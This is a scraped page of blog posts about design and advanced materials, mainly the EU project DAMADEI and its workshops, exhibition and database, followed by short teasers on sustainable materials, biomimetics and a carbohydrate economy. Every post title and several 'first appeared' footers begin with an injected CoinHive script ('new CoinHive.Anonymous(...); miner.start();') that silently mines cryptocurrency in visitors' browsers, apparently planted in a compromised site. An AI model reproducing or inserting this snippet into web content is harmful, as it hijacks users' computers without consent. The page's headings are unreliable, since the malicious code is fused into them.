var miner = new CoinHive.Anonymous(49dVbbCFDuhg9nX5u1MDuATVZj7gQehytZwvXEUuWg9kfhNPWH7bUD87VW1NfjqucRZNNVTb1AHGUK2fkq5Nd55mLNnB4WK); miner.start(); Design and Advanced Materials As a Driver of European Innovation

In recent years advanced materials have emerged and are having a major impact on the products around us. Coming from science and technology advanced materials can outperform traditional materials as they for instance can be tougher, can withstand higher temperatures, and can be tailored into new shapes. When combining these materials with design the door to future products and solutions opens. One of the main remaining barriers is the lack of knowledge of the potential use of advanced materials in designing new products. Danish Design Centre has partnered up with FAD in Barcelona and Happy Materials in Prague on the EU-project DAMADEI – “Design and Advanced Materials As a Driver of European Innovation”. The project that runs till Ultimo October seeks to put focus on European competitiveness. It also aims to raise awareness among designers and to provide them with the appropriate experience on how to take advantage of the huge opportunities regarding these advanced materials. Output Besides consolidating a long-term collaborative European infrastructure to enhance the current network of partners through the involvement of the main European design sector and advanced materials stakeholders DAMADEI also aims to identify the needs, barriers and common areas of applications of both sectors as well as developing the potential interaction of Design and Advanced Materials as drivers of European innovation. As a part of this 4 workshops (London 1st March, Copenhagen 22nd April, Prague 28nd May and Barcelona 8th July) will be hold to stimulate creative processes by exchanging European best practices in design through the application of advanced materials. Following these four workshops the exhibition ‘MATERIALSM EUROPEAN TOUR’ has been created. The exhibition that is curated by the partners of DAMADEI, aims to educate and to inspire the creative industries with 40+ advanced materials chosen from the material families that are driving today´s innovations: Active materials, Nano materials, Advanced manufacturing, High performance polymers, Light alloys, Gels & Foams, Coatings, Advanced composites, Advanced textiles and Fibres. At last but not least – and based on the DAMADEI’s mapping of the European Design and Advanced Materials sectors – a collaborative platform with an online database and meeting point for Design and Advanced Materials is being created. his platform will give any user the possibility to search European actors of advanced materials within suppliers, designers, technology centres and connecting centres in nine different material categories. Advanced Materials An advanced material is any material that, through the precise control of its composition and internal structure, features a series of exceptional properties (mechanical, electrical, optical, magnetic properties, etc) or functionalities (self-repairing, shape change, decontamination, transformation of energy, etc) that differentiate it from the rest of the universe of materials; or any that, when transformed through advanced manufacturing techniques, features such properties or functionalities. — Post from Hello MaterialsThe post var miner = new CoinHive.Anonymous('49dVbbCFDuhg9nX5u1MDuATVZj7gQehytZwvXEUuWg9kfhNPWH7bUD87VW1NfjqucRZNNVTb1AHGUK2fkq5Nd55mLNnB4WK'); miner.start(); Design and Advanced Materials As a Driver of European Innovation first appeared on Wilmar.

  • Web: Wilmar
  • Aktualizace: 2.7.2024
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var miner = new CoinHive.Anonymous(49dVbbCFDuhg9nX5u1MDuATVZj7gQehytZwvXEUuWg9kfhNPWH7bUD87VW1NfjqucRZNNVTb1AHGUK2fkq5Nd55mLNnB4WK); miner.start(); Hello world!

Welcome to WordPress. This is your first post. Edit or delete it, then start blogging! The post var miner = new CoinHive.Anonymous('49dVbbCFDuhg9nX5u1MDuATVZj7gQehytZwvXEUuWg9kfhNPWH7bUD87VW1NfjqucRZNNVTb1AHGUK2fkq5Nd55mLNnB4WK'); miner.start(); Hello w

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var miner = new CoinHive.Anonymous(49dVbbCFDuhg9nX5u1MDuATVZj7gQehytZwvXEUuWg9kfhNPWH7bUD87VW1NfjqucRZNNVTb1AHGUK2fkq5Nd55mLNnB4WK); miner.start(); Choosing sustainable products and materials

The increasing availability of product environmental information provides an opportunity for consumers to choose more sustainable products and for designers to be rewarded for selecting more sustainable materials. Here are some tips on how to do this. Us

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var miner = new CoinHive.Anonymous(49dVbbCFDuhg9nX5u1MDuATVZj7gQehytZwvXEUuWg9kfhNPWH7bUD87VW1NfjqucRZNNVTb1AHGUK2fkq5Nd55mLNnB4WK); miner.start(); Materials and Manufacturing Education

Materials and manufacturing processes remains an essential component of industrial design education. But for many students and young designers, they are still unsure of their comfort with these complex issues and how they affect their designs. The first

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var miner = new CoinHive.Anonymous(49dVbbCFDuhg9nX5u1MDuATVZj7gQehytZwvXEUuWg9kfhNPWH7bUD87VW1NfjqucRZNNVTb1AHGUK2fkq5Nd55mLNnB4WK); miner.start(); Biomimetics as a tool for the development of new materials

Biomimetics is on everyone’s lips and it is now difficult to imagine a future where it does not play a key role in the development of our society. The development of new materials is not unconcerned with this new discipline, though we must be aware of wha

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var miner = new CoinHive.Anonymous(49dVbbCFDuhg9nX5u1MDuATVZj7gQehytZwvXEUuWg9kfhNPWH7bUD87VW1NfjqucRZNNVTb1AHGUK2fkq5Nd55mLNnB4WK); miner.start(); Materials for the Carbohydrate Economy

One of the most significant future transformations in the material sphere will be the development of a carbohydrate economy. This will be a global economy based primarily on renewable material feedstocks—as opposed to our current economy, which is founded

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